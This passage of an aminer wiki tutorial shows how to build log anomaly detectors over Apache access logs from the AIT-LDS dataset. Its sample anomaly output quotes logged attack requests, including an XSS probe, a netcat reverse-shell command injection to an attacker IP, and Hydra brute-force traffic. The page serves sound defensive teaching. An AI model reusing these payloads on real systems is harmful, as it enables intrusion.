
aminer TryItOut

landauermax edited this page Aug 7, 2023 · 17 revisions

This wiki outlines the practical application of the aminer for log analysis and anomaly detection. The demonstration involves setting up a simple log analysis pipeline containing detectors for unparsed log lines, new log event types, values, and value combinations. All described analyses are carried out using several data sets contained in the AIT-LDSv1.1 (https://zenodo.org/record/4264796). A final version of the configuration that is incrementally built throughout this section is available at the end of this page. Note that this tutorial assumes that the aminer is correctly installed as outlined in Getting Started and that readers are already familiar with basic aminer configurations. As in Getting Started, this tutorial is carried out on Ubuntu Bionic:

alice@ubuntu1804:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.5 LTS
Release:	18.04
Codename:	bionic

Configuration of the aminer for AIT-LDSv1.1

In the following, a sample aminer configuration for analyzing Apache Access logs that are contained in the AIT-LDSv1.1 is explained. Subsequent sections will build upon this configuration, without showing and discussing identical parts multiple times. In addition, it is reasonable to split up input log files into training files that the aminer uses for learning, and test log files that contain the attacks and are used to demonstrate the detection capabilities of the aminer.

Try it out: Split Apache Access log data into training and test files

The Apache Access log file contains logs collected over six days. Since only the fifth day is affected by attacks, the first four days are used for training and the last two days are used for testing aminer's detection capabilities. To split the log file between the fourth and fifth day, use the commands:

cd /home/ubuntu/data/mail.cup.com/apache2
split -d -l 97577 mail.cup.com-access.log access_
head -n 4 access_00

This generates the training file access_00 containing 97,577 lines as well as the test file access_01 containing 50,977 lines. The first four lines of the training file are:

192.168.10.190 - - [29/Feb/2020:00:00:02 +0000] "GET /login.php HTTP/1.1" 200 2532 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
192.168.10.4 - - [29/Feb/2020:00:00:09 +0000] "POST /services/ajax.php/kronolith/listTopTags HTTP/1.1" 200 402 "http://mail.cup.com kronolith/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"
192.168.10.190 - - [29/Feb/2020:00:00:12 +0000] "POST /login.php HTTP/1.1" 302 601 "http://mail.cup.com/login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
192.168.10.190 - - [29/Feb/2020:00:00:13 +0000] "GET /services/portal/ HTTP/1.1" 200 7696 "http://mail.cup.com/login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"

As outlined in this wiki, log parsers are essential for adequately analyzing log data and running the aminer. The generation of these parsers is usually a rather time-consuming task, but may be supported by automatic tools (for more information on automatic generation of aminer parsers see https://github.com/ait-aecid/aecid-parsergenerator). All parsers required to process the log files contained in the AIT-LDSv1.1 come with the aminer default installation. The parser for the Apache Access logs is shown below. As visible, the parser involves various elements, including control elements for sequences, branches, and optional nodes of the model, as well as nodes for particular data types of log line tokens, such as fixed strings, variable strings, integers, time stamps, IP addresses, etc.

"""This module defines a generated parser model."""

from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model():
    """Return a model to parse Apache Access logs from the AIT-LDS."""
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"

    model = SequenceModelElement("model", [
        FirstMatchModelElement("client_ip", [
            SequenceModelElement("client_ip", [
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("sp0", b" "),
                IpAddressDataModelElement("client_ip")
                ]),
            SequenceModelElement("localhost", [
                DelimitedDataModelElement("domain", b" "),
                FixedDataModelElement("sp0", b" "),
                FixedDataModelElement("localhost", b"::1")
                ]),
            IpAddressDataModelElement("client_ip"),
            FixedDataModelElement("localhost", b"::1")
            ]),
        FixedDataModelElement("sp1", b" "),
        VariableByteDataModelElement("client_id", alphabet),
        FixedDataModelElement("sp2", b" "),
        VariableByteDataModelElement("user_id", alphabet),
        FixedDataModelElement("sp3", b" ["),
        DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"),
        FixedDataModelElement("sp4", b'] "'),
        FirstMatchModelElement("fm", [
            FixedDataModelElement("dash", b"-"),
            SequenceModelElement("request", [
                FixedWordlistDataModelElement("method", [
                    b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND",
                    b"MKCOL"]),
                FixedDataModelElement("sp5", b" "),
                DelimitedDataModelElement("request", b" ", b"\\"),
                FixedDataModelElement("sp6", b" "),
                DelimitedDataModelElement("version", b'"'),
                ])
            ]),
        FixedDataModelElement("sp7", b'" '),
        DecimalIntegerValueModelElement("status_code"),
        FixedDataModelElement("sp8", b" "),
        DecimalIntegerValueModelElement("content_size"),
        OptionalMatchModelElement(
            "combined", SequenceModelElement("combined", [
                FixedDataModelElement("sp9", b' "'),
                DelimitedDataModelElement("referer", b'"', b"\\"),
                FixedDataModelElement("sp10", b'" "'),
                DelimitedDataModelElement("user_agent", b'"', b"\\"),
                FixedDataModelElement("sp11", b'"'),
                ]))
        ])

    return model
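The format string b"%d/%b/%Y:%H:%M:%S%z" used by the DateTimeModelElement above corresponds to the timestamp format of the sample log lines. As a quick sanity check (a sketch using Python's standard library, not part of the aminer; note that strptime needs an explicit space before %z here), the timestamp of the first sample line can be parsed as follows:

```python
from datetime import datetime

# Timestamp taken from the first sample log line above.
ts = datetime.strptime("29/Feb/2020:00:00:02 +0000", "%d/%b/%Y:%H:%M:%S %z")

print(ts.isoformat())       # 2020-02-29T00:00:02+00:00
print(int(ts.timestamp()))  # 1582934402 (Unix epoch seconds)
```

The epoch value 1582934402 is exactly what the aminer later reports in the Timestamps field of its anomaly output.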

Try it out: Add aminer parser models

To make use of the parsers for the AIT-LDSv1.1, it is necessary to add them to the group of enabled parsers. To do this, just create a link for all available AIT-LDS parser models using the command:

sudo ln -s /etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/

The configuration of the aminer makes use of parser models and places them at the beginning of a log processing pipeline. It also allows you to select and configure analysis components and detectors, and to define the output of the aminer, i.e., the interface to the analyst. Note that the aminer can run both on live data, i.e., logs that are generated on-the-fly, and forensically on historic data sets. This try-it-out focuses only on forensic analysis, since all logs in the AIT-LDSv1.1 were collected beforehand.

Try it out: Set up aminer configuration

First, copy the default YAML-configuration and open it using the commands:

sudo cp /etc/aminer/template_config.yml /etc/aminer/config.yml
sudo vim /etc/aminer/config.yml

The configuration is structured into several sections. First, it is necessary to define the learn mode, which specifies whether we want to train the models or start detection. Since we are just getting started and have not trained the models yet, we set the learn mode to true as follows.

LearnMode: True

Next, we have to specify the input log file. In the first part of this try-it-out section, only logs from the Apache Access log file are considered. Set the path to the correct file of the extracted AIT-LDSv1.1, e.g.,

LogResourceList:
    - 'file:///home/ubuntu/data/mail.cup.com/apache2/access_00'

Next, the parser has to be added to the configuration. For this, import the Apache Access parsing model by referencing the name of the parser file implemented in Python (ApacheAccessParsingModel) and then add a FirstMatchModelElement as a root node (indicated by id: 'START') so that other parsing models can easily be added parallel to the Apache Access parsing model later on.

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args: 
      - apacheAccessModel

Further configurations on the input are as follows. Note that multi_source is set to True in case more input files are added later.

Input:
  multi_source: True
  timestamp_paths: 
    - '/parser/model/time'

To test the configuration and the parsing of log lines, it is advisable to add an analysis component that provides some debug output, before focusing on more complex detectors. One path that all log lines from the Apache Access log file pass through is used to count the number of log lines processed from that input source. Moreover, the output is generated every 10 seconds as specified by report_interval.

Analysis:
  - type: 'ParserCount'
    paths:
      - '/parser/model/status_code' # Apache Access 
    report_interval: 10

Finally, an output component is added to the pipeline that simply writes all messages created by the aminer to the console in JSON format.

EventHandlers:
  - id: 'stpe'
    json: True
    type: 'StreamPrinterEventHandler'

Try it out: Run aminer

Once the configuration is ready, it is easy to run the aminer from the console. Note that running the aminer with sudo is necessary because data has to be persisted in directories owned by the aminer user. Use the following command to start the aminer in the foreground with the previously created configuration file.

sudo aminer --config /etc/aminer/config.yml

The aminer will immediately report some anomalies. The reason is that no log lines have been observed up to that point, so each new type of log line is an anomaly. These anomalies are reported by the NewMatchPathDetector, which is always active and monitors all paths defined in the parser model. Since the Apache Access parsing model is relatively simple, the aminer soon learns all possible paths and stops reporting new anomalies.

Since no other detectors that raise anomalies were added to the pipeline, each line in the log file is parsed without undergoing any further analysis. Only the ParserCount component shows the current progress of parsing by printing out the total number of processed lines, e.g.,

{
  "StatusInfo": {
    "/parser/model/status_code": {
      "CurrentProcessedLines": 4,
      "TotalProcessedLines": 4
    }
  },
  "FromTime": 1596457890.205487,
  "ToTime": 1596457900.205512
}

Once all logs are processed, i.e., the parsed log line count does not increase anymore, terminate the aminer. Note that when restarting the aminer on the same input file, no more path anomalies are reported. The reason is that the aminer persisted all learned paths, so nothing has to be learned in future aminer runs on the same data. To reset the persistency of the aminer, manually delete the corresponding persistency files, e.g., those of the path detector:

sudo rm -r /var/lib/aminer/NewMatchPathDetector

Apache Access logs

The previous section ran the aminer on normal data. All data that is produced during normal operation should be covered by the parsing model, i.e., every possible event has to be modeled prior to parsing. Since the structure of attack manifestations and other anomalous logs is usually unknown, it is not always feasible to include every possible type of event in the parser. In most cases, it is even desirable to have a rather restrictive model that is unable to parse logs with previously unknown syntax, because such logs likely stem from failures or malicious activity and should be reported anyway. Unparsed logs are thus the most basic type of anomaly and are always reported, because the aminer cannot analyze a line with unknown contents and thus has to assume that it may be linked to malicious activity.

Try it out: Run aminer for unparsed log detection

To test the detection of unparsed logs, switch from the training file (access_00) to the test file (access_01) by adapting the path to the input file as follows:

LogResourceList:
  - 'file:///home/ubuntu/data/mail.cup.com/apache2/access_01'

Then, start the aminer as before. Several anomalies that are caused by attack manifestations are reported by the aminer. The reason for this is that one of the attacks carried out on the system involves a vulnerability scanner that randomly uses all kinds of unusual access techniques. One of the anomalies is shown here:

{
  "DebugLog": [
    "Starting match update on b'192.168.10.238 - - 
      [04/Mar/2020:19:18:46 +0000] \"<script>alert(1)</script> /
      HTTP/1.1\" 400 0 \"-\" \"-\"'",
      "Removed b'192.168.10.238', remaining 86 bytes",
      "Removed b' ', remaining 85 bytes",
      "Removed b'-', remaining 84 bytes",
      "Removed b' ', remaining 83 bytes",
      "Removed b'-', remaining 82 bytes",
      "Removed b' [', remaining 80 bytes",
      "Removed b'04/Mar/2020:19:18:46', remaining 60 bytes",
      "Removed b' +', remaining 58 bytes",
      "Removed b'0000', remaining 54 bytes",
      "Removed b'] \"', remaining 51 bytes",
      "Shortest unmatched data was b'<script>alert(1)</script> / 
        HTTP/1.1\" 400 0 \"-\" \"-\"'",
      ""
    ],
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:18:46 +0000] 
       	\"<script>alert(1)</script> / HTTP/1.1\" 400 0 
       	\"-\" \"-\""
    ],
    "Timestamps": [
      1596712108.24
    ],
    "LogLinesCount": 1
  },
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": null,
    "AnalysisComponentType": "VerboseUnparsedAtomHandler",
    "AnalysisComponentName": null,
    "Message": "Unparsed atom received",
    "PersistenceFileName": null
  }
}

As depicted in the JSON-formatted anomaly, the malicious log line (displayed in field RawLogData) contains the code injection attempt <script>alert(1)</script> at the position where the HTTP access method (e.g., GET or POST) should be stated. Also note that the field DebugLog of the anomaly contains precise information on the progress of parsing and the first token that could not be parsed, which makes it easy to adapt or extend the parser model in case the anomaly is a false positive and the event should be regarded as part of the normal behavior.
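The token-by-token consumption visible in the DebugLog can be illustrated with a simplified sketch (illustrative only, not the actual aminer parsing implementation): the parser strips expected tokens from the front of the line until one fails to match, and the remainder is reported as unmatched data.

```python
def consume(line, tokens):
    """Strip a sequence of expected fixed tokens from the front of a log
    line; return the unmatched remainder, or None if everything matched."""
    rest = line
    for token in tokens:
        if rest.startswith(token):
            rest = rest[len(token):]
        else:
            return rest  # first position where parsing failed
    return None

# Heavily simplified token sequence a parser might expect at line start;
# the last expected token (an HTTP method) fails to match the injected code.
line = b'::1 - - [x] "<script>alert(1)</script>'
rest = consume(line, [b"::1", b" ", b"-", b" ", b"-", b" [", b"x", b'] "', b"GET"])
print(rest)  # b'<script>alert(1)</script>'
```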

Value detectors are useful for monitoring values occurring at specific positions in log events, i.e., at specific parser paths. This is particularly useful for discrete values from a limited set. All values that occur in the training phase at that position of a specific type of log event are considered normal, and all new values encountered during detection are reported as anomalies. For the Apache Access logs, several parser paths come into question for such an analysis. In the following example, the status code of the logged accesses is selected, because it is reasonable to assume that all possible status codes that should occur during normal behavior are present in the training log file.
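The core idea of such a value detector can be sketched in a few lines (a simplified illustration, not the actual NewMatchPathValueDetector implementation): known values are kept in a set, new values are reported as anomalies, and in learn mode they are immediately added to the set.

```python
class NewValueDetector:
    """Sketch of a new-value detector: report values never seen before
    and, in learn mode, add them to the set of known values."""

    def __init__(self, learn_mode=True):
        self.known_values = set()
        self.learn_mode = learn_mode

    def process(self, value):
        """Return True if an anomaly (new value) is reported."""
        if value in self.known_values:
            return False
        if self.learn_mode:
            self.known_values.add(value)
        return True

# training phase: every first occurrence is reported once, then learned
det = NewValueDetector(learn_mode=True)
print([det.process(v) for v in ["200", "200", "302", "200"]])  # [True, False, True, False]

# detection phase: unknown values are reported every time they occur
det.learn_mode = False
print([det.process(v) for v in ["400", "400", "200"]])  # [True, True, False]
```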

Try it out: Run aminer with value detector

First open the configuration and change the input file back to the training file access_00. Then, insert the value detector in the section containing the analysis components, i.e.,

Analysis:
  - type: 'NewMatchPathValueDetector'
    paths: ['/parser/model/status_code']
    persistence_id: 'accesslog_status'
    output_logline: False
    learn_mode: True

Note that the parser path specified in field paths points to the status code of the HTTP request, e.g., 200 in the first, second, and fourth lines, or 302 in the third line of the Apache sample log. In addition, the learn_mode parameter is set to True, meaning that all newly observed values are reported as anomalies, but are immediately added to the set of known values that are considered normal. Setting the parameter output_logline to False avoids adding detailed parsing information to the output, which makes it easier to screen through the anomalies. Start the aminer again to see one of these anomalies, also shown below. As visible in the field AffectedLogAtomValues, the normal status code 200 was learned.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "NewMatchPathValueDetector",
    "AnalysisComponentName": "NewMatchPathValueDetector2",
    "Message": "New value(s) detected",
    "PersistenceFileName": "accesslog_status",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/parser/model/status_code"
    ],
    "AffectedLogAtomValues": [
      "200"
    ],
    "LogResource": "file:////tmp/access_00"
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.190 - - [29/Feb/2020:00:00:02 +0000] \"GET /login.php HTTP/1.1\" 200 2532 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\""
    ],
    "Timestamps": [
      1582934402
    ],
    "DetectionTimestamp": 1639755001.06,
    "LogLinesCount": 1
  }
}

Once all log lines have been processed, terminate the aminer, which causes all learned values to be written to the persistency. View the persisted values using the command:

sudo vim /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 

Observe that only four different status codes (200, 304, 408, and 302) occurred during normal behavior. To use this knowledge for anomaly detection, open the configuration and replace the path to the training file (access_00) with the path to the test file (access_01) just as before. Also switch the learn_mode flag of the value detector from True to False, i.e.,

Analysis:
  - type: 'NewMatchPathValueDetector'
    paths: ['/parser/model/status_code']
    persistence_id: 'accesslog_status'
    output_logline: False
    learn_mode: False

This ensures that anomalous values encountered in the test file are raised as anomalies, but are not learned and therefore not added to the persistency, making it possible to detect them again when more lines with the same anomalous value occur or when the aminer is restarted multiple times. Save the configuration and run the aminer to obtain a large number of anomalies. Most of them are caused by the vulnerability scanner that attempts to access several non-existing files, which yields status code 400, e.g.,

"AffectedLogAtomValues": [
  "400"
],
"RawLogData": [
  "192.168.10.238 - - [04/Mar/2020:19:18:35 +0000] "GET 
    /perl/-e%20print%20Hello HTTP/1.1" 400 0 "-" "-""
]

Not only individual values are relevant for anomaly detection. Values at different positions in log events are often related to each other, and the occurrence of a single value may not be sufficient to differentiate normal from anomalous system behavior. Therefore, occurrences of combinations of values should be considered, which is the main purpose of the NewMatchPathValueComboDetector.
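The same principle extends naturally to value combinations by treating the tuple of values as the learned unit, as this simplified sketch shows (illustrative only, not the actual NewMatchPathValueComboDetector implementation):

```python
# Learned combinations are stored as tuples in a set.
known_combos = set()

def check_combo(method, user_agent, learn_mode=True):
    """Return True if the (method, user_agent) combination is new."""
    combo = (method, user_agent)
    if combo in known_combos:
        return False
    if learn_mode:
        known_combos.add(combo)
    return True

# training: GET/Firefox and POST/Firefox are learned as normal
check_combo("GET", "Firefox")
check_combo("POST", "Firefox")

# detection: GET alone is known, but GET combined with curl is anomalous
print(check_combo("GET", "curl/7.58.0", learn_mode=False))  # True
print(check_combo("GET", "Firefox", learn_mode=False))      # False
```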

Try it out: Run aminer with combination detector

As before, switch the input file back to the training file access_00. Similar to the value detector, add the combination detector to the list of analysis components. Note that more than one path is required, otherwise the combination detector works identically to the value detector. In this case, the method of the logged access, e.g., GET or POST, and the user agent are used for forming combinations. This makes it possible to monitor which access methods were used by which user agents. Setting allow_missing_values to False ensures that a log line must contain parsed values for both the parser path to the method and the parser path to the user agent to be considered for learning and detection.

Analysis:
  - type: 'NewMatchPathValueComboDetector'
    paths:
      - '/parser/model/fm/request/method'
      - '/parser/model/combined/combined/user_agent'
    persistence_id: 'accesslog_request_agent'
    output_logline: False
    allow_missing_values: False
    learn_mode: True

To avoid a large number of anomalies and ease testing the functionalities of different detectors, comment out or remove the previously added value detector from the configuration. Note that in practice, it is usually beneficial to combine several detectors. Then, run the aminer on the training file and view the learned combinations using the command:

sudo vim /var/lib/aminer/NewMatchPathValueComboDetector/accesslog_request_agent 

The learned combinations look as follows. Note that the method is referenced by an index number, since all allowed values are defined as a list in the parsing model, i.e., 0=GET, 1=POST, and 6=OPTIONS.

[6, "bytes:Apache/2.4.25 (Debian) OpenSSL/1.0.2u (internal dummy connection)"], 
[0, "bytes:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"], 
[0, "bytes:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"], 
[1, "bytes:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"], 
[1, "bytes:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36"]
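Since the FixedWordlistDataModelElement matches against a fixed list of words, it persists the index of the matched word rather than the word itself. The indices can be translated back using the word list from the Apache Access parser model shown earlier:

```python
# Word list copied from the Apache Access parser model above.
methods = ["GET", "POST", "PUT", "HEAD", "DELETE", "CONNECT", "OPTIONS",
           "TRACE", "PATCH", "REPORT", "PROPFIND", "MKCOL"]

for index in (0, 1, 6):
    print(index, "=", methods[index])
# 0 = GET
# 1 = POST
# 6 = OPTIONS
```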

Now, switch to the test input file access_01, set learn_mode of NewMatchPathValueComboDetector to False, and start the aminer. Again, a large number of anomalies is disclosed, e.g.,

"AffectedLogAtomValues": [
  "0",
  "curl/7.58.0"
],
  "RawLogData": [
    "192.168.10.238 - - [04/Mar/2020:19:32:50 +0000] \"GET 
      /static/evil.php?cmd=netcat%20-e%20/bin/
      bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 
      \"-\" \"curl/7.58.0\""
]

Note that the GET request (indicated by index 0) monitored by a value detector would not have triggered an anomaly; only the combined occurrence with a certain user agent is considered anomalous. The following alert, on the other hand, involves an access method that is not present in the training data (HEAD with index 3) as well as a new user agent.

"AffectedLogAtomValues": [
  "3",
  "python-requests/2.18.4"
],
"RawLogData": [
  "192.168.10.238 - - [04/Mar/2020:19:32:45 +0000] \"HEAD 
    /static/evil.php HTTP/1.1\" 200 167 \"-\" 
    \"python-requests/2.18.4\""
]

The value and combination detectors are relatively static, i.e., they do not consider temporal dependencies between the values they monitor. This is achieved by the event correlation detector, which assumes that the occurrence of a particular value at some position in a log line temporally correlates with the occurrence of another value at the same position, possibly with some delay. This principle works analogously for combinations of values as well as for types of events.

In more detail, the event correlation detector creates random hypotheses between pairs of value occurrences that are observed once, and then continues to test these hypotheses until eventually discarding the ones that appear unstable, i.e., have not been observed a sufficient number of times, and transforming the stable ones into rules, i.e., correlations that are reported as anomalies when violated. Note that correlations are not necessarily strict, but instead based on statistical binomial tests. This means that rules observed to hold with a certain probability are tested against that probability, i.e., a certain number of failed tests may be allowed without reporting an anomaly.

Try it out: Run aminer with value range detector

Use the training file and train the aminer with the following analysis component:

  - type: 'ParserCount'
    paths:
      - '/parser/model/status_code' # Apache Access 
    report_interval: 10

  - type: 'ValueRangeDetector'
    paths:
      - '/parser/model/content_size'
    id_path_list:
      - '/parser/model/client_ip/client_ip'
    learn_mode: True

As we specify the client IP in the id_path_list parameter, the aminer will learn the minimum and maximum values of the content size (specified in the paths parameter) separately for each client IP. Check out the persistency to see what this means:

sudo cat /var/lib/aminer/ValueRangeDetector/Default
[{"tuple:('3232238270',)": 163, "tuple:('3232238084',)": 0, "tuple:()": 110, "tuple:('3232238318',)": 163, "tuple:('3232238280',)": 163}, {"tuple:('3232238270',)": 50928, "tuple:('3232238084',)": 50928, "tuple:()": 110, "tuple:('3232238318',)": 50928, "tuple:('3232238280',)": 50927}]

Note that IP addresses are represented in decimal format. For example, the address 3232238318 occurred with a minimum content size of 163 and a maximum size of 50928 bytes. Now switch from the training file to the test file and run the aminer again with learn_mode set to False.
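The decimal numbers in the persistency are simply 32-bit integer representations of the IPv4 addresses. They can be converted back to dotted notation, e.g., with Python's standard ipaddress module:

```python
import ipaddress

# Decimal addresses taken from the persistency output above.
for decimal in (3232238318, 3232238084, 3232238270):
    print(decimal, "=", ipaddress.ip_address(decimal))
# 3232238318 = 192.168.10.238
# 3232238084 = 192.168.10.4
# 3232238270 = 192.168.10.190
```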

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "ValueRangeDetector",
    "AnalysisComponentName": "ValueRangeDetector3",
    "Message": "Value range anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": false,
    "AffectedLogAtomPaths": [
      "/parser/model/content_size"
    ],
    "AffectedLogAtomValues": [
      131
    ],
    "Range": [
      163,
      50928
    ],
    "IDpaths": [
      "/parser/model/client_ip/client_ip"
    ],
    "IDvalues": [
      "3232238318"
    ]
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:32:50 +0000] \"GET /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 \"-\" \"curl/7.58.0\""
    ],
    "Timestamps": [
      1583350370
    ],
    "DetectionTimestamp": 1653044208.14,
    "LogLinesCount": 1
  }
}

As you can see, there is an anomaly for an event related to command injection; in particular, the content size of 131 bytes retrieved by the command is smaller than the minimum observed size of 163 bytes. Note that, for example, address 3232238084 has a minimum value of 0; it is thus essential to split up the learned sizes by IP address, otherwise the attack would not have triggered the alert, since 131 > 0.
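The per-identifier range learning performed by the detector can be sketched as follows (a simplified illustration, not the actual ValueRangeDetector implementation):

```python
# Map each identifier (here: client IP) to its learned (min, max) range.
ranges = {}

def observe(identifier, value):
    """Learning phase: extend the known range for this identifier."""
    lo, hi = ranges.get(identifier, (value, value))
    ranges[identifier] = (min(lo, value), max(hi, value))

def is_anomalous(identifier, value):
    """Detection phase: a value outside the learned range is anomalous."""
    if identifier not in ranges:
        return True
    lo, hi = ranges[identifier]
    return value < lo or value > hi

# training with content sizes similar to the persisted values above
observe("192.168.10.238", 163)
observe("192.168.10.238", 50928)
observe("192.168.10.4", 0)
observe("192.168.10.4", 50928)

# the 131-byte response is anomalous only when split by client IP
print(is_anomalous("192.168.10.238", 131))  # True  (below its minimum of 163)
print(is_anomalous("192.168.10.4", 131))    # False (within [0, 50928])
```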

Try it out: Run aminer with event correlation detector

Use the training file access_00 for input and append the event correlation detector to the configuration of the aminer as follows:

Analysis:
  - type: 'EventCorrelationDetector'
    paths:
      - '/parser/model/fm/request/method'
      - '/parser/model/fm/request/request'
    max_observations: 200
    hypothesis_max_delta_time: 10.0
    hypotheses_eval_delta_time: 28800.0
    delta_time_to_discard_hypothesis: 28800.0
    p0: 0.95
    alpha: 0.05
    check_rules_flag: False
    persistence_id: 'accesslog_method_request'
    learn_mode: True

As before, learn_mode is set to True so that new hypotheses and rules are generated by the detector. The detector uses value combinations from the method, e.g., GET or POST, and the request, e.g., /login.php, for the generation of rules. This makes it possible to monitor the sequences in which web pages are usually opened, e.g., the calendar web page is usually visited using a GET request before a new calendar entry is saved using a POST request. Since check_rules_flag is set to False, the generated rules are not evaluated on the training set. The parameters max_observations, p0, and alpha specify the sample size, initial probability, and significance of the statistical tests. Moreover, successful hypothesis and rule evaluations must occur within 10 seconds, as specified by hypothesis_max_delta_time, and are otherwise evaluated as failed. The parameters hypotheses_eval_delta_time and delta_time_to_discard_hypothesis are set to the relatively long time span of 8 hours (28,800 seconds) to make sure that hypotheses are not discarded during night time, when little or no user activity occurs.
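The statistical idea behind the rule checks can be sketched with a simple binomial test (an illustration of the principle, not the exact test implemented in the aminer): a rule is considered violated if observing that few successful correlations is very unlikely under the assumed success probability p0.

```python
from math import comb

def binom_cdf(k, n, p):
    """P(X <= k) for X ~ Binomial(n, p)."""
    return sum(comb(n, i) * p**i * (1 - p)**(n - i) for i in range(k + 1))

def rule_violated(successes, trials, p0=0.95, alpha=0.05):
    """Reject the rule if this few successes is very unlikely under p0."""
    return binom_cdf(successes, trials, p0) < alpha

# 13 of 14 correlations fulfilled: compatible with p0 = 0.95
print(rule_violated(13, 14))  # False
# 0 of 14 fulfilled: clear violation of the rule
print(rule_violated(0, 14))   # True
```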

Again, for the purpose of experimentation within this try-it-out section it is beneficial to comment out the value and combination detector to make analyzing and interpreting the results of the event correlation detector easier. Start the aminer and wait until all logs are processed. Then, terminate the aminer and open the persistency of the EventCorrelationDetector by:

sudo vim /var/lib/aminer/EventCorrelationDetector/accesslog_method_request 

The detector should have found several correlations, some of which are displayed in the following.

["string:forward", ["string:1", "string:/login.php"], ["string:0", "string:/services/portal/"], 190, 185],
["string:back", ["string:1", "string:/services/ajax.php/kronolith/listCalendars"], ["string:0", "string:/kronolith/"], 185, 185],
["string:back", ["string:0", "string:/nag/list.php"], ["string:1", "string:/nag/task/save.php"], 185, 185],
["string:forward", ["string:1", "string:/services/ajax.php/imp/dynamicInit"], ["string:1", "string:/services/ajax.php/imp/viewPort"], 200, 185]

The first rule is interpreted as follows. Every occurrence of the value combination POST and /login.php is expected to be followed (forward) by an occurrence of the value combination GET and /services/portal/ within 10 seconds. This makes sense, because every successful login is automatically redirected to the main portal of the web site. The correlation was observed 185 out of 190 times in the training file before the hypothesis was transformed into a rule, which yields a probability of around 0.974 (97.4%) as the basis of the binomial test. The 5 failed correlations may be caused by user login attempts with incorrect user names or passwords.

Other than the first rule, the second rule is a back rule, meaning that the correlation points to the past rather than the future. In particular, every occurrence of the value combination POST and /services/ajax.php/kronolith/listCalendars must have been preceded by an occurrence of the value combination GET and /kronolith/ in the previous 10 seconds. Also note that this rule was observed 185 out of 185 times in the learning phase, meaning that a single failure to detect this correlation will trigger an anomaly in the detection phase.

To test the event correlation detection, switch the input file path to the access_01 file, set learn_mode of EventCorrelationDetector to False so that no new hypotheses are generated, set check_rules_flag to True to use the persisted rules, and set alpha to 0.001 to increase the margin of error for rule evaluations so that only strong violations are reported. In practice, it is common to set both learn_mode and check_rules_flag to True in order to learn and test rules in parallel. When running the aminer again, several false positives are reported because of random fluctuations in the user behavior. However, among them are anomalies that relate to the Hydra attack, which attempts to brute-force its way into an account. Since the detector learned in the training phase that accesses to /login.php with a POST method are usually followed by accesses to the main web page /services/portal/, the increase of unsuccessful attempts was detected as a violation of this correlation. As visible in the RuleInfo field of the following JSON-formatted anomaly, after observing 14 accesses to /login.php without a single access to /services/portal/, all allowed failures were consumed and the anomaly was reported.

{
  "RuleInfo": {
    "Rule": "('1', '/login.php')->('0', '/services/portal/')",
    "Expected": "187/200",
    "Observed": "0/14"
  },
  "LogData": {
    "RawLogData": [
      "192.168.10.238 - - [04/Mar/2020:19:26:22 +0000] \"GET /login.php 
        HTTP/1.0\" 200 6335 \"-\" \"Mozilla/5.0 (Hydra)\""
    ],
    "Timestamps": [
      1583349982
    ],
    "LogLinesCount": 2
  },
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EventCorrelationDetector",
    "AnalysisComponentName": "EventCorrelationDetector2",
    "Message": "Correlation rule violated! Event b'192.168.10.4 - - 
      [04/Mar/2020:19:25:53 +0000] \"GET /services/portal/ HTTP/1.1\" 
